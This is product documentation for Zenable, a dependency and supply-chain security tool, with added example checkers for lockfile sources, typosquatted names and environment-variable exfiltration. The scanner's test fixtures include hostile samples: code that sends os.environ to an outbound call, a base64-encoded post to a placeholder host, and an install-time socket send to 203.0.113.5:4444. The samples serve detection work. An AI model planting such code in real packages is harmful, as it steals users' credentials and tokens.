Overview

Dependencies change constantly and are hard to track by hand. Zenable monitors dependency changes, detects suspicious packages, blocks lookalike (typosquatted) packages, and watches for unwanted behavior such as malicious updates pushed by an insider, giving you a protected supply chain and a significant reduction in insider-threat risk.

Out-of-the-Box Protection

Zenable automatically provides these standard supply chain protections:

Standard Security Checks

  • Typosquatting Detection - Identifies lookalike package names
  • Known Vulnerabilities - Checks against CVE databases
  • Suspicious Patterns - Detects obfuscated code and unexpected network calls
  • License Compliance - Flags incompatible licenses
  • Outdated Dependencies - Identifies severely outdated packages
  • Malicious Package Detection - Checks against known malware databases

Custom Organization Requirements

Layer your specific supply chain policies on top:
“All dependencies must be from our approved vendor list, no GPL licenses in production code, all packages must be internally mirrored, and any package from developers outside our organization requires security team approval.”

Example: Custom Vendor Requirements

Your Policy: “Only use packages from approved vendors with active support contracts”
// ❌ Zenable flags unapproved dependency
{
  "dependencies": {
    "random-utility": "^1.0.0",  // Not from approved vendor
    "community-lib": "^2.3.1"    // No support contract
  }
}

// ✅ Zenable ensures compliance
{
  "dependencies": {
    "@approved-vendor/utility": "^1.0.0",
    "@enterprise/supported-lib": "^2.3.1"
  }
}

Example: Internal Registry Enforcement

Your Policy: “All packages must be pulled from our internal Artifactory mirror”
# ❌ Standard npm install (resolves from the public registry)
npm install express

# ✅ Zenable enforces internal registry
npm install express --registry=https://artifactory.company.com/npm

The per-command flag is easy to omit, so the durable form of this policy is a committed .npmrc setting (registry=https://artifactory.company.com/npm), which makes the mirror the default for every install. npm config get registry shows what an install in the current directory would use, and the resolved URLs in package-lock.json record where each package actually came from.
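One way to enforce the same policy from the other end, as an added example that is not Zenable's own code: audit package-lock.json, where npm records the resolved tarball URL for every installed package, and flag any entry that did not come from the mirror or that carries no integrity hash. The mirror host and the lockfile content below are constructed for illustration.

```python
"""Audit an npm lockfile: every resolved tarball must come from the internal
mirror. Added example, not Zenable's code; the mirror host and the lockfile
below are constructed for illustration."""
import json
from urllib.parse import urlparse

# Assumed internal mirror (hypothetical host from the policy above).
ALLOWED_HOSTS = {"artifactory.company.com"}

# Constructed package-lock.json (lockfileVersion 3 layout) with one package
# that slipped in from the public registry, one workspace link with no
# tarball, and one mirror package missing its integrity hash.
SAMPLE_LOCK = json.dumps({
    "name": "demo", "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo", "dependencies": {"express": "^4.17.1"}},
        "node_modules/express": {
            "version": "4.17.1",
            "resolved": "https://artifactory.company.com/npm/express/-/express-4.17.1.tgz",
            "integrity": "sha512-constructed",
        },
        "node_modules/accepts": {
            "version": "1.3.8",
            "resolved": "https://registry.npmjs.org/accepts/-/accepts-1.3.8.tgz",
            "integrity": "sha512-constructed",
        },
        "node_modules/local-lib": {"link": True, "resolved": "packages/local-lib"},
        "node_modules/no-integrity": {
            "version": "1.0.0",
            "resolved": "https://artifactory.company.com/npm/no-integrity/-/no-integrity-1.0.0.tgz",
        },
    },
})


def audit_lockfile(lock_text, allowed_hosts=ALLOWED_HOSTS):
    """Return a list of (package path, reason) findings for a lockfile."""
    lock = json.loads(lock_text)
    findings = []
    # lockfileVersion 2/3 list packages under "packages"; v1 uses "dependencies".
    entries = lock.get("packages") or lock.get("dependencies") or {}
    for path, meta in entries.items():
        if path == "" or meta.get("link"):
            continue  # the root project and workspace links have no tarball
        resolved = meta.get("resolved")
        if not resolved:
            findings.append((path, "no resolved URL; install source is unverifiable"))
            continue
        host = urlparse(resolved).hostname
        if host not in allowed_hosts:
            findings.append((path, f"resolved from {host}, not the internal mirror"))
        if not meta.get("integrity"):
            findings.append((path, "no integrity hash; tarball contents are unpinned"))
    return findings


if __name__ == "__main__":
    for path, reason in audit_lockfile(SAMPLE_LOCK):
        print(f"{path}: {reason}")
```

The lockfile is what a reproducible install actually fetches, so this catches an entry that was committed while a developer's registry configuration pointed elsewhere, independent of how the install command was typed.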

In Action

# First, flatten uv.lock into a requirements file the checker can read
# (--no-hashes drops the per-package hashes, which the check does not need)
uv export --format requirements-txt --no-hashes > temp-requirements.txt

# Then, check your dependencies for both standard and custom violations
uvx zenable-mcp check package.json temp-requirements.txt

# Cleanup: restore the file if it is tracked in git, otherwise delete it
git checkout HEAD -- temp-requirements.txt 2>/dev/null || rm -f temp-requirements.txt

Example Protection

Lookalike Package Detection

// ❌ Zenable detects typosquatting
{
  "dependencies": {
    "expresss": "^4.17.1",  // Extra 's' - likely typosquatting
    "momnet": "^2.29.1"     // 'momnet' instead of 'moment'
  }
}
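The approved-vendor policy from the custom-requirements example and the lookalike detection shown here, as one added example that is not Zenable's own code: it reads package.json, treats any scope not on the approved list as an unapproved vendor, and compares each bare package name against a list of popular names using an edit distance that counts an adjacent transposition (momnet for moment) as a single edit. The approved scopes, the popular-name list and the manifest below are constructed for illustration.

```python
"""Check package.json against an approved-vendor policy and a lookalike-name
heuristic. Added example (not Zenable's code); the approved scopes, popular
names and manifest below are constructed for illustration."""
import json

# Policy inputs (hypothetical): scopes covered by a support contract, plus
# unscoped packages the organisation has explicitly approved.
APPROVED_SCOPES = {"@approved-vendor", "@enterprise"}
APPROVED_UNSCOPED = {"express", "moment"}

# Names attackers imitate. A real deployment would use the registry's most
# downloaded packages plus the organisation's own package names.
POPULAR = {"express", "moment", "lodash", "request", "react"}

SAMPLE_MANIFEST = json.dumps({
    "dependencies": {
        "@approved-vendor/utility": "^1.0.0",
        "expresss": "^4.17.1",
        "momnet": "^2.29.1",
        "random-utility": "^1.0.0",
        "express": "^4.18.0",
    },
    "devDependencies": {"@unknown-scope/tool": "^0.1.0"},
})


def edit_distance(a, b):
    """Optimal string alignment distance: insertions, deletions, substitutions
    and adjacent transpositions each cost 1, so 'momnet' vs 'moment' is 1
    (plain Levenshtein says 2, and a transposition-only squat could slip by)."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def split_scope(name):
    """'@scope/pkg' -> ('@scope', 'pkg'); 'pkg' -> (None, 'pkg')."""
    if name.startswith("@") and "/" in name:
        scope, bare = name.split("/", 1)
        return scope, bare
    return None, name


def lookalike_of(name, popular=POPULAR, max_distance=1):
    """Return the popular name this package imitates, or None."""
    _, bare = split_scope(name)
    if bare in popular:
        return None  # the real thing, not an imitation
    for real in sorted(popular):
        if edit_distance(bare, real) <= max_distance:
            return real
    return None


def check_manifest(manifest_text):
    """Return (package, reason) findings across all dependency sections."""
    manifest = json.loads(manifest_text)
    findings = []
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name in manifest.get(section, {}):
            scope, _ = split_scope(name)
            if scope not in APPROVED_SCOPES and name not in APPROVED_UNSCOPED:
                findings.append((name, "unapproved vendor"))
            real = lookalike_of(name)
            if real is not None:
                findings.append((name, f"lookalike of '{real}'"))
    return findings


if __name__ == "__main__":
    for name, reason in check_manifest(SAMPLE_MANIFEST):
        print(f"{name}: {reason}")
```

The vendor check is deny-by-default: a scope it has never seen is a finding, which is the posture the policy asks for. A distance threshold of 1 is noisy for very short names (three-letter packages are all one edit from each other), so a production version would weight matches by the popularity gap between the two names or require a minimum length before comparing.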

Suspicious Behavior Detection

# ❌ Zenable flags unexpected behavior in dependencies
def innocent_function():
    # Hidden data exfiltration attempt: the process environment commonly
    # holds API keys, tokens and CI credentials
    import os
    send_to_external(os.environ)  # placeholder for any outbound channel
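A static heuristic for this pattern, as an added example that is not Zenable's analysis engine: walk each scope with Python's ast module and report any function (or module-level code, which runs at import or install time) that both reads os.environ and calls something that can send data off-host. The sink names and the sample sources, including a base64-laundered variant that simple argument matching would miss, are constructed for illustration.

```python
"""Heuristic scan for scopes that read os.environ and hand data to an
outbound sink. Added example (not Zenable's engine); sink names and sample
sources are constructed for illustration."""
import ast

# Call names treated as outbound sinks (hypothetical and deliberately coarse:
# matching on the bare method name ignores which object it is called on).
NETWORK_SINKS = {"send_to_external", "urlopen", "post", "sendall", "connect"}

# Constructed sources: the snippet above, a benign environ read, a laundered
# variant, and an install-time payload that runs at module level.
SAMPLE_SOURCES = {
    "innocent.py": """
def innocent_function():
    import os
    send_to_external(os.environ)
""",
    "legit.py": """
import os
def get_home():
    return os.environ.get("HOME")
""",
    "laundered.py": """
import os, base64
def setup():
    blob = base64.b64encode(repr(dict(os.environ)).encode())
    requests.post("https://example.invalid/c", data=blob)
""",
    "setup.py": """
import os, socket
socket.create_connection(("203.0.113.5", 4444)).sendall(str(dict(os.environ)).encode())
""",
}


class EnvironExfilFinder(ast.NodeVisitor):
    """Tracks, per scope, whether os.environ was read and which sinks were called."""

    def __init__(self):
        self.findings = []  # (scope name, line, sorted sink names)
        self._reads_env = False
        self._sinks = []

    def _scan_scope(self, name, node):
        outer = (self._reads_env, self._sinks)
        self._reads_env, self._sinks = False, []
        self.generic_visit(node)  # nested defs open their own scope via visit_FunctionDef
        if self._reads_env and self._sinks:
            self.findings.append((name, getattr(node, "lineno", 1), sorted(set(self._sinks))))
        self._reads_env, self._sinks = outer

    def visit_Module(self, node):
        self._scan_scope("<module>", node)

    def visit_FunctionDef(self, node):
        self._scan_scope(node.name, node)

    visit_AsyncFunctionDef = visit_FunctionDef

    def visit_Attribute(self, node):
        # os.environ parses as Attribute(value=Name(id='os'), attr='environ')
        if node.attr == "environ" and isinstance(node.value, ast.Name) and node.value.id == "os":
            self._reads_env = True
        self.generic_visit(node)

    def visit_Call(self, node):
        func = node.func
        if isinstance(func, ast.Attribute) and func.attr == "getenv" \
                and isinstance(func.value, ast.Name) and func.value.id == "os":
            self._reads_env = True  # os.getenv() is an environ read too
        name = func.id if isinstance(func, ast.Name) else getattr(func, "attr", None)
        if name in NETWORK_SINKS:
            self._sinks.append(name)
        self.generic_visit(node)


def scan_source(filename, source):
    """Return (file, scope, line, sinks) findings for one source file."""
    finder = EnvironExfilFinder()
    finder.visit(ast.parse(source, filename=filename))
    return [(filename, scope, line, sinks) for scope, line, sinks in finder.findings]


def scan_all(sources=SAMPLE_SOURCES):
    findings = []
    for filename, source in sources.items():
        findings.extend(scan_source(filename, source))
    return findings


if __name__ == "__main__":
    for filename, scope, line, sinks in scan_all():
        print(f"{filename}:{line} {scope}: reads os.environ and calls {', '.join(sinks)}")
```

Co-occurrence within a scope is used instead of tracing the environ value into the sink's arguments on purpose: the laundered sample encodes the data first, and any per-argument check would lose it at the first transformation. The trade-off is that a function which legitimately reads one variable and also makes a network call is reported, so this is a triage signal, not a verdict; it also does not see from os import environ or values read in one function and sent from another.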

Continuous Protection

Zenable continuously monitors your dependencies for:
  • Changes in package behavior between versions
  • New or modified dependencies in your codebase
  • Suspicious patterns that could indicate compromise
  • Lookalike packages that could be malicious

Benefits

  • Protected Supply Chain - Comprehensive monitoring of code changes and of every new dependency introduced
  • Reduced Insider Threat Risk - Detect and prevent malicious updates from compromised or malicious developer accounts
  • Prevent Lookalike Attacks - Catch typosquatting and similar attacks before they cause damage
  • Monitor Unwanted Behavior - Identify when dependencies start behaving suspiciously

Real-World Custom Examples

Financial Services Requirements

Policy: “All cryptographic libraries must be FIPS 140-2 validated”

Healthcare Requirements

Policy: “No dependencies can transmit data to servers outside the US”

Government Requirements

Policy: “All dependencies must be from US-based developers with security clearance”